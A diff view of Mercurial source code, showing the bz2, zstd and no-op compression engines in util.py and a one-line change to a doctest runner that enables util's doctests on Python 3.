3566 3568 compengines.register(_zlibengine())
3567 3569
3568 3570 class _bz2engine(compressionengine):
3569 3571 def name(self):
3570 3572 return 'bz2'
3571 3573
3572 3574 def bundletype(self):
3573 3575 """An algorithm that produces smaller bundles than ``gzip``.
3574 3576
3575 3577 All Mercurial clients should support this format.
3576 3578
3577 3579 This engine will likely produce smaller bundles than ``gzip`` but
3578 3580 will be significantly slower, both during compression and
3579 3581 decompression.
3580 3582
3581 3583 If available, the ``zstd`` engine can yield similar or better
3582 3584 compression at much higher speeds.
3583 3585 """
3584 3586 return 'bzip2', 'BZ'
3585 3587
3586 3588 # We declare a protocol name but don't advertise by default because
3587 3589 # it is slow.
3588 3590 def wireprotosupport(self):
3589 3591 return compewireprotosupport('bzip2', 0, 0)
3590 3592
3591 3593 def compressstream(self, it, opts=None):
3592 3594 opts = opts or {}
3593 3595 z = bz2.BZ2Compressor(opts.get('level', 9))
3594 3596 for chunk in it:
3595 3597 data = z.compress(chunk)
3596 3598 if data:
3597 3599 yield data
3598 3600
3599 3601 yield z.flush()
3600 3602
3601 3603 def decompressorreader(self, fh):
3602 3604 def gen():
3603 3605 d = bz2.BZ2Decompressor()
3604 3606 for chunk in filechunkiter(fh):
3605 3607 yield d.decompress(chunk)
3606 3608
3607 3609 return chunkbuffer(gen())
3608 3610
3609 3611 compengines.register(_bz2engine())
3610 3612
3611 3613 class _truncatedbz2engine(compressionengine):
3612 3614 def name(self):
3613 3615 return 'bz2truncated'
3614 3616
3615 3617 def bundletype(self):
3616 3618 return None, '_truncatedBZ'
3617 3619
3618 3620 # We don't implement compressstream because it is hackily handled elsewhere.
3619 3621
3620 3622 def decompressorreader(self, fh):
3621 3623 def gen():
3622 3624 # The input stream doesn't have the 'BZ' header. So add it back.
3623 3625 d = bz2.BZ2Decompressor()
3624 3626 d.decompress('BZ')
3625 3627 for chunk in filechunkiter(fh):
3626 3628 yield d.decompress(chunk)
3627 3629
3628 3630 return chunkbuffer(gen())
3629 3631
3630 3632 compengines.register(_truncatedbz2engine())
3631 3633
3632 3634 class _noopengine(compressionengine):
3633 3635 def name(self):
3634 3636 return 'none'
3635 3637
3636 3638 def bundletype(self):
3637 3639 """No compression is performed.
3638 3640
3639 3641 Use this compression engine to explicitly disable compression.
3640 3642 """
3641 3643 return 'none', 'UN'
3642 3644
3643 3645 # Clients always support uncompressed payloads. Servers don't because
3644 3646 # unless you are on a fast network, uncompressed payloads can easily
3645 3647 # saturate your network pipe.
3646 3648 def wireprotosupport(self):
3647 3649 return compewireprotosupport('none', 0, 10)
3648 3650
3649 3651 # We don't implement revlogheader because it is handled specially
3650 3652 # in the revlog class.
3651 3653
3652 3654 def compressstream(self, it, opts=None):
3653 3655 return it
3654 3656
3655 3657 def decompressorreader(self, fh):
3656 3658 return fh
3657 3659
3658 3660 class nooprevlogcompressor(object):
3659 3661 def compress(self, data):
3660 3662 return None
3661 3663
3662 3664 def revlogcompressor(self, opts=None):
3663 3665 return self.nooprevlogcompressor()
3664 3666
3665 3667 compengines.register(_noopengine())
3666 3668
3667 3669 class _zstdengine(compressionengine):
3668 3670 def name(self):
3669 3671 return 'zstd'
3670 3672
3671 3673 @propertycache
3672 3674 def _module(self):
3673 3675 # Not all installs have the zstd module available. So defer importing
3674 3676 # until first access.
3675 3677 try:
3676 3678 from . import zstd
3677 3679 # Force delayed import.
3678 3680 zstd.__version__
3679 3681 return zstd
3680 3682 except ImportError:
3681 3683 return None
3682 3684
3683 3685 def available(self):
3684 3686 return bool(self._module)
3685 3687
3686 3688 def bundletype(self):
3687 3689 """A modern compression algorithm that is fast and highly flexible.
3688 3690
3689 3691 Only supported by Mercurial 4.1 and newer clients.
3690 3692
3691 3693 With the default settings, zstd compression is both faster and yields
3692 3694 better compression than ``gzip``. It also frequently yields better
3693 3695 compression than ``bzip2`` while operating at much higher speeds.
3694 3696
3695 3697 If this engine is available and backwards compatibility is not a
3696 3698 concern, it is likely the best available engine.
3697 3699 """
3698 3700 return 'zstd', 'ZS'
3699 3701
3700 3702 def wireprotosupport(self):
3701 3703 return compewireprotosupport('zstd', 50, 50)
3702 3704
3703 3705 def revlogheader(self):
3704 3706 return '\x28'
3705 3707
3706 3708 def compressstream(self, it, opts=None):
3707 3709 opts = opts or {}
3708 3710 # zstd level 3 is almost always significantly faster than zlib
3709 3711 # while providing no worse compression. It strikes a good balance
3710 3712 # between speed and compression.
3711 3713 level = opts.get('level', 3)
3712 3714
3713 3715 zstd = self._module
3714 3716 z = zstd.ZstdCompressor(level=level).compressobj()
3715 3717 for chunk in it:
3716 3718 data = z.compress(chunk)
3717 3719 if data:
3718 3720 yield data
3719 3721
3720 3722 yield z.flush()
3721 3723
3722 3724 def decompressorreader(self, fh):
3723 3725 zstd = self._module
3724 3726 dctx = zstd.ZstdDecompressor()
3725 3727 return chunkbuffer(dctx.read_from(fh))
3726 3728
3727 3729 class zstdrevlogcompressor(object):
3728 3730 def __init__(self, zstd, level=3):
3729 3731 # Writing the content size adds a few bytes to the output. However,
3730 3732 # it allows decompression to be more optimal since we can
3731 3733 # pre-allocate a buffer to hold the result.
3732 3734 self._cctx = zstd.ZstdCompressor(level=level,
3733 3735 write_content_size=True)
3734 3736 self._dctx = zstd.ZstdDecompressor()
3735 3737 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3736 3738 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3737 3739
3738 3740 def compress(self, data):
3739 3741 insize = len(data)
3740 3742 # Caller handles empty input case.
3741 3743 assert insize > 0
3742 3744
3743 3745 if insize < 50:
3744 3746 return None
3745 3747
3746 3748 elif insize <= 1000000:
3747 3749 compressed = self._cctx.compress(data)
3748 3750 if len(compressed) < insize:
3749 3751 return compressed
3750 3752 return None
3751 3753 else:
3752 3754 z = self._cctx.compressobj()
3753 3755 chunks = []
3754 3756 pos = 0
3755 3757 while pos < insize:
3756 3758 pos2 = pos + self._compinsize
3757 3759 chunk = z.compress(data[pos:pos2])
3758 3760 if chunk:
3759 3761 chunks.append(chunk)
3760 3762 pos = pos2
3761 3763 chunks.append(z.flush())
3762 3764
3763 3765 if sum(map(len, chunks)) < insize:
3764 3766 return ''.join(chunks)
3765 3767 return None
3766 3768
3767 3769 def decompress(self, data):
3768 3770 insize = len(data)
3769 3771
3770 3772 try:
3771 3773 # This was measured to be faster than other streaming
3772 3774 # decompressors.
3773 3775 dobj = self._dctx.decompressobj()
3774 3776 chunks = []
3775 3777 pos = 0
3776 3778 while pos < insize:
3777 3779 pos2 = pos + self._decompinsize
3778 3780 chunk = dobj.decompress(data[pos:pos2])
3779 3781 if chunk:
3780 3782 chunks.append(chunk)
3781 3783 pos = pos2
3782 3784 # Frame should be exhausted, so no finish() API.
3783 3785
3784 3786 return ''.join(chunks)
3785 3787 except Exception as e:
3786 3788 raise error.RevlogError(_('revlog decompress error: %s') %
3787 3789 str(e))
3788 3790
3789 3791 def revlogcompressor(self, opts=None):
3790 3792 opts = opts or {}
3791 3793 return self.zstdrevlogcompressor(self._module,
3792 3794 level=opts.get('level', 3))
3793 3795
3794 3796 compengines.register(_zstdengine())
3795 3797
3796 3798 def bundlecompressiontopics():
3797 3799 """Obtains a list of available bundle compressions for use in help."""
3798 3800 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3799 3801 items = {}
3800 3802
3801 3803 # We need to format the docstring. So use a dummy object/type to hold it
3802 3804 # rather than mutating the original.
3803 3805 class docobject(object):
3804 3806 pass
3805 3807
3806 3808 for name in compengines:
3807 3809 engine = compengines[name]
3808 3810
3809 3811 if not engine.available():
3810 3812 continue
3811 3813
3812 3814 bt = engine.bundletype()
3813 3815 if not bt or not bt[0]:
3814 3816 continue
3815 3817
3816 3818 doc = pycompat.sysstr('``%s``\n %s') % (
3817 3819 bt[0], engine.bundletype.__doc__)
3818 3820
3819 3821 value = docobject()
3820 3822 value.__doc__ = doc
3821 3823 value._origdoc = engine.bundletype.__doc__
3822 3824 value._origfunc = engine.bundletype
3823 3825
3824 3826 items[bt[0]] = value
3825 3827
3826 3828 return items
3827 3829
3828 3830 i18nfunctions = bundlecompressiontopics().values()
3829 3831
3830 3832 # convenient shortcut
3831 3833 dst = debugstacktrace
@@ -1,81 +1,81 b''
1 1 # this is hack to make sure no escape characters are inserted into the output
2 2
3 3 from __future__ import absolute_import
4 4
5 5 import doctest
6 6 import os
7 7 import re
8 8 import sys
9 9
10 10 ispy3 = (sys.version_info[0] >= 3)
11 11
12 12 if 'TERM' in os.environ:
13 13 del os.environ['TERM']
14 14
15 15 class py3docchecker(doctest.OutputChecker):
16 16 def check_output(self, want, got, optionflags):
17 17 want2 = re.sub(r'''\bu(['"])(.*?)\1''', r'\1\2\1', want) # py2: u''
18 18 got2 = re.sub(r'''\bb(['"])(.*?)\1''', r'\1\2\1', got) # py3: b''
19 19 # py3: <exc.name>: b'<msg>' -> <name>: <msg>
20 20 # <exc.name>: <others> -> <name>: <others>
21 21 got2 = re.sub(r'''^mercurial\.\w+\.(\w+): (['"])(.*?)\2''', r'\1: \3',
22 22 got2, re.MULTILINE)
23 23 got2 = re.sub(r'^mercurial\.\w+\.(\w+): ', r'\1: ', got2, re.MULTILINE)
24 24 return any(doctest.OutputChecker.check_output(self, w, g, optionflags)
25 25 for w, g in [(want, got), (want2, got2)])
26 26
27 27 # TODO: migrate doctests to py3 and enable them on both versions
28 28 def testmod(name, optionflags=0, testtarget=None, py2=True, py3=True):
29 29 if not (not ispy3 and py2 or ispy3 and py3):
30 30 return
31 31 __import__(name)
32 32 mod = sys.modules[name]
33 33 if testtarget is not None:
34 34 mod = getattr(mod, testtarget)
35 35
36 36 # minimal copy of doctest.testmod()
37 37 finder = doctest.DocTestFinder()
38 38 checker = None
39 39 if ispy3:
40 40 checker = py3docchecker()
41 41 runner = doctest.DocTestRunner(checker=checker, optionflags=optionflags)
42 42 for test in finder.find(mod, name):
43 43 runner.run(test)
44 44 runner.summarize()
45 45
46 46 testmod('mercurial.changegroup')
47 47 testmod('mercurial.changelog')
48 48 testmod('mercurial.color')
49 49 testmod('mercurial.config')
50 50 testmod('mercurial.context')
51 51 testmod('mercurial.dagparser', optionflags=doctest.NORMALIZE_WHITESPACE)
52 52 testmod('mercurial.dispatch')
53 53 testmod('mercurial.encoding')
54 54 testmod('mercurial.formatter')
55 55 testmod('mercurial.hg')
56 56 testmod('mercurial.hgweb.hgwebdir_mod')
57 57 testmod('mercurial.match')
58 58 testmod('mercurial.mdiff')
59 59 testmod('mercurial.minirst')
60 60 testmod('mercurial.patch')
61 61 testmod('mercurial.pathutil')
62 62 testmod('mercurial.parser')
63 63 testmod('mercurial.pycompat')
64 64 testmod('mercurial.revsetlang')
65 65 testmod('mercurial.smartset')
66 66 testmod('mercurial.store')
67 67 testmod('mercurial.subrepo')
68 68 testmod('mercurial.templatefilters')
69 69 testmod('mercurial.templater')
70 70 testmod('mercurial.ui')
71 71 testmod('mercurial.url')
72 testmod('mercurial.util', py3=False) # py3: multiple bytes/unicode issues
72 testmod('mercurial.util')
73 73 testmod('mercurial.util', testtarget='platform')
74 74 testmod('hgext.convert.convcmd')
75 75 testmod('hgext.convert.cvsps')
76 76 testmod('hgext.convert.filemap')
77 77 testmod('hgext.convert.p4')
78 78 testmod('hgext.convert.subversion')
79 79 testmod('hgext.mq')
80 80 # Helper scripts in tests/ that have doctests:
81 81 testmod('drawdag')
General Comments 0
You need to be logged in to leave comments. Login now